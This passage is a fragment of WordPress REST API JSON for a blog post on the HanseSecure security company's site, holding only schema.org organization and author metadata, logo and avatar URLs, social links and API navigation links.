GmbH","url":"https:\/\/hansesecure.de\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hansesecure.de\/en\/#\/schema\/logo\/image\/","url":"https:\/\/hansesecure.de\/wp-content\/uploads\/2023\/05\/cropped-000-LOGO-intensiv-schwarz-rot-HanseSecure_LOGO_CTI_Vektor_rotes_H11806.png","contentUrl":"https:\/\/hansesecure.de\/wp-content\/uploads\/2023\/05\/cropped-000-LOGO-intensiv-schwarz-rot-HanseSecure_LOGO_CTI_Vektor_rotes_H11806.png","width":512,"height":512,"caption":"HanseSecure GmbH"},"image":{"@id":"https:\/\/hansesecure.de\/en\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/hansesecure","https:\/\/x.com\/CyberWarship","https:\/\/www.linkedin.com\/company\/hansesecure","https:\/\/www.youtube.com\/channel\/UCAABbKOA_stDFkEKS3MSF7Q","https:\/\/www.instagram.com\/hansesecure\/"]},{"@type":"Person","@id":"https:\/\/hansesecure.de\/en\/#\/schema\/person\/6ec6ef4887ff2fc97a14f1a7f390f593","name":"HanseSecure","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g","caption":"HanseSecure"}}]}},"_links":{"self":[{"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/posts\/7384","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/comments?post=7384"}],"version-history":[{"count":1,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/posts\/7384\/revisions"}],"predecessor-version":[{"id":9320,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/posts\/7384\/revisions\/9320"}],"wp:attachment":[{"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/media?parent=7384"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/categories?post=7384"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/tags?post=7384"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}